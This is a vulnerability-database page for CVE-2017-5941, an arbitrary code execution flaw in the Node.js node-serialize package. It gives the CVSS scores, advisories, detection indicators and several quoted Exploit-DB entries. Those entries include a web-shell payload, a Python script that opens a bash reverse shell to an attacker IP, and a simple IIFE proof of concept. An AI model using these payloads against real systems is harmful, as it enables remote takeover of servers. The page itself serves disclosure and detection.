CVE-2017-5941
published 2017-02-09CVE-2017-5941: An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the unserialize() function can be exploited to achieve…
PriorityP277critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
61.02%
99.0th percentile
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the unserialize() function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| node-serialize_project | node-serialize | <= 0.0.4 | — |
| node-serialize_project | node-serialize | 0 – 0.0.4 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect the IIFE marker string '_$$ND_FUNC$$_' in deserialized input — its presence in data passed to unserialize() is the direct trigger for arbitrary code execution. ↗
- →Inspect HTTP cookies (especially a cookie named 'profile') for base64-encoded payloads containing the '_$$ND_FUNC$$_' prefix, which is the exploit delivery mechanism observed in the wild. ↗
- →Monitor for Node.js processes unexpectedly opening listening TCP sockets (e.g., on port 443) via http.createServer().listen(), which is the web shell persistence mechanism used in exploit variant 3. ↗
- →Flag JSON objects containing the key 'webShell' or 'rce' with values prefixed by '_$$ND_FUNC$$_' as these are the exploit payload field names used across multiple public exploit variants. ↗
- ·The exploit only triggers when the '_$$ND_FUNC$$_' marker is present AND the function is immediately invoked (IIFE pattern with trailing '()'); serialized functions without the invocation suffix are not directly executed on deserialization. ↗
- ·The vulnerability is specific to node-serialize version 0.0.4; detections and mitigations should be scoped to environments running this exact package version. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Code Execution through IIFE in node-serialize
ghsa·2018-07-18
CVE-2017-5941 [CRITICAL] CWE-502 Code Execution through IIFE in node-serialize
Code Execution through IIFE in node-serialize
Affected versions of `node-serialize` can be abused to execute arbitrary code via an [immediately invoked function expression](https://en.wikipedia.org/wiki/Immediately-invoked_function_expression) (IIFE) if untrusted user input is passed into `unserialize()`.
## Recommendation
There is no direct patch for this issue. The package author has reviewed this advisory, and provided the following recommendation:
```
To avoid the security issues, at least one of the following methods should be taken:
1. Make sure to send serialized strings internally, isolating them from potential hackers. For example, only sending the strings from backend to fronend and always using HTTPS instead of HTTP.
2. Introduce public-key cryptosystems (e.g. RSA) to ens
OSV
Code Execution through IIFE in node-serialize
osv·2018-07-18
CVE-2017-5941 [CRITICAL] Code Execution through IIFE in node-serialize
Code Execution through IIFE in node-serialize
Affected versions of `node-serialize` can be abused to execute arbitrary code via an [immediately invoked function expression](https://en.wikipedia.org/wiki/Immediately-invoked_function_expression) (IIFE) if untrusted user input is passed into `unserialize()`.
## Recommendation
There is no direct patch for this issue. The package author has reviewed this advisory, and provided the following recommendation:
```
To avoid the security issues, at least one of the following methods should be taken:
1. Make sure to send serialized strings internally, isolating them from potential hackers. For example, only sending the strings from backend to fronend and always using HTTPS instead of HTTP.
2. Introduce public-key cryptosystems (e.g. RSA) to ens
No detection rules found.
Exploit-DB
Node.JS - 'node-serialize' Remote Code Execution (3)
exploitdb·2021-06-18
CVE-2017-5941 Node.JS - 'node-serialize' Remote Code Execution (3)
Node.JS - 'node-serialize' Remote Code Execution (3)
---
# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (3)
# Date: 17.06.2021
# Exploit Author: Beren Kuday GORUN
# Vendor Homepage: https://github.com/luin/serialize
# Software Link: https://github.com/luin/serialize
# Version: 0.0.4
# Tested on: Windows & Ubuntu
# CVE : 2017-5941
var serialize = require('node-serialize');
var payload = {
"webShell" : "_$$ND_FUNC$$_function(){const http = require('http'); const url = require('url'); const ps = require('child_process'); http.createServer(function (req, res) { var queryObject = url.parse(req.url,true).query; var cmd = queryObject['cmd']; try { ps.exec(cmd, function(error, stdout, stderr) { res.end(stdout); }); } catch (error) { return; }}).listen(443); }()"
}
serialize.u
Exploit-DB
Node.JS - 'node-serialize' Remote Code Execution (2)
exploitdb·2021-02-10·CVSS 9.8
CVE-2017-5941 [CRITICAL] Node.JS - 'node-serialize' Remote Code Execution (2)
Node.JS - 'node-serialize' Remote Code Execution (2)
---
# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
# Exploit Author: UndeadLarva
# Software Link: https://www.npmjs.com/package/node-serialize
# Version: 0.0.4
# CVE: CVE-2017-5941
import requests
import re
import base64
import sys
url = 'http://192.168.100.133:8000/' # change this
payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
"return function () {"
"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
"console.log('still inside');"
"const { exec } = require('child_process');"
"exec('bash -i >& /dev/tcp/192.168.200.5/445 0>&1');" # change this
"}"
"})(require('http').ServerResponse.prototype.en
Exploit-DB
Node.JS - 'node-serialize' Remote Code Execution
exploitdb·2017-02-08
CVE-2017-5941 Node.JS - 'node-serialize' Remote Code Execution
Node.JS - 'node-serialize' Remote Code Execution
---
var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);
http://packetstormsecurity.com/files/161356/Node.JS-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/163222/Node.JS-Remote-Code-Execution.htmlhttp://www.securityfocus.com/bid/96225https://nodesecurity.io/advisories/311https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/http://packetstormsecurity.com/files/161356/Node.JS-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/163222/Node.JS-Remote-Code-Execution.htmlhttp://www.securityfocus.com/bid/96225https://nodesecurity.io/advisories/311https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
2017-02-09
Published